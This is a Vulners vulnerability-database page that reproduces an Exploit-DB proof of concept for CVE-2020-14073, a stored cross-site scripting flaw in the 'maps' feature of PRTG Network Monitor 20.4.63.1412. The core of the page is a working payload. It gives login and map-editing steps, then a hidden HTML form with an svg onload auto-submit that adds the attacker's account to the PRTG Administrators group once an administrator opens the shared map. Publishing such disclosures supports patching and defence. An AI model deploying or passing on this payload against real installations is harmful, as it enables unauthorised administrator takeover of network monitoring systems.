Vulners
Lucene search
PRTG Network Monitor 20.4.63.1412 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Paessler PRTG Network Monitor Cross-Site Scripting Vulnerability (CNVD-2020-52850) | 24 Jun 202000:00 | – | cnvd |
 | CVE-2020-14073 | 23 Jun 202019:09 | – | cve |
 | CVE-2020-14073 | 23 Jun 202019:09 | – | cvelist |
 | PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS | 2 Dec 202000:00 | – | exploitdb |
 | EUVD-2020-6232 | 7 Oct 202500:30 | – | euvd |
 | CVE-2020-14073 | 23 Jun 202020:15 | – | nvd |
 | PRTG Network Monitor 7.x - 22.1.75.1569 XSS Vulnerability | 11 Mar 202100:00 | – | openvas |
 | CVE-2020-14073 | 23 Jun 202020:15 | – | osv |
 | Cross site scripting | 23 Jun 202020:15 | – | prion |
 | PT-2020-13878 · Paessler · Prtg Network Monitor | 23 Jun 202000:00 | – | ptsecurity |
10
`# Exploit Title: PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS
# Date: 2/12/2020
# Exploit Author: Amin Rawah
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/prtg
# Version: 20.4.63.1412 x64
# Tested on: Windows
# CVE : CVE-2020-14073
Description:
Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalte his/her privilege to PRTG Administrator.
Steps:
1- Login to PRTG system and view source code (currentUserId)
2- Create a map, add an element, double click the element and modify the HTML section 'HTML After'
3- In 'HTML After' add the following code:
<form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name_" value="PRTG Administrators" />
<input type="hidden" name="defaulthome_" value="/welcome.htm" />
<input type="hidden" name="isadgroup" value="0" />
<input type="hidden" name="adusertype_" value="0" />
<input type="hidden" name="aduserack_" value="0" />
<input type="hidden" name="users_" value="1" />
<input type="hidden" name="users_" value="1" />
<input type="hidden" name="users__check" value="<currentUserId>|<YOUR_USERNAME>|" />
<input type="hidden" name="users__check" value="100|PRTG System Administrator|" />
<input type="hidden" name="id" value="200" />
<input type="hidden" name="targeturl" value="/systemsetup.htm?tabid=6" />
<input type="submit" value="Submit request" />
</form>
<svg/onload='document.forms[0].submit()'/>
4- Save and share the link with PRTG Administrator.
5- Login with the highest privilege.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2020 00:00Current
5.6Medium risk
Vulners AI Score5.6
EPSS0.00981